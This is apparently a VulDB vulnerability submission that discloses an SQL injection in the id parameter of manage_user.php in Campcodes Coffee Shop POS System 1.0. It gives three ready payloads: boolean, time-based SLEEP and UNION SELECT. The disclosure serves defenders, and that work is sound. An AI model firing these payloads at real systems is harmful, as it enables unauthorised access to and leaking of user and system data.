| 제목 | SQL injection vulnerability exists in Coffee Shop POS System |
|---|
| 설명 | SQL injection vulnerability exists in id parameter of /admin/user/manage_user.php file of Coffee Shop POS System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘user/manage_user’,it will include /admin/user/manage_user.php,and id parameter can do sql injection.
Payload:
page=user/manage_user&id=1' AND 2678=2678 AND 'TkSe'='TkSe
or
page=user/manage_user&id=1' AND (SELECT 4852 FROM (SELECT(SLEEP(5)))rple) AND 'aaQF'='aaQF
or
page=user/manage_user&id=-4079' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627071,0x7063415a6d7665494f4c4a4450414b524553537771734d764b69784c64735245766756466475504a,0x7178717a71),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Coffee%20Shop%20POS%20System/Coffee%20Shop%20POS%20System%20-%20vuln%207.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 제출 | 2023. 04. 19. PM 12:16 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 21. AM 08:29 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 226980 [Campcodes Coffee Shop POS System 1.0 manage_user.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|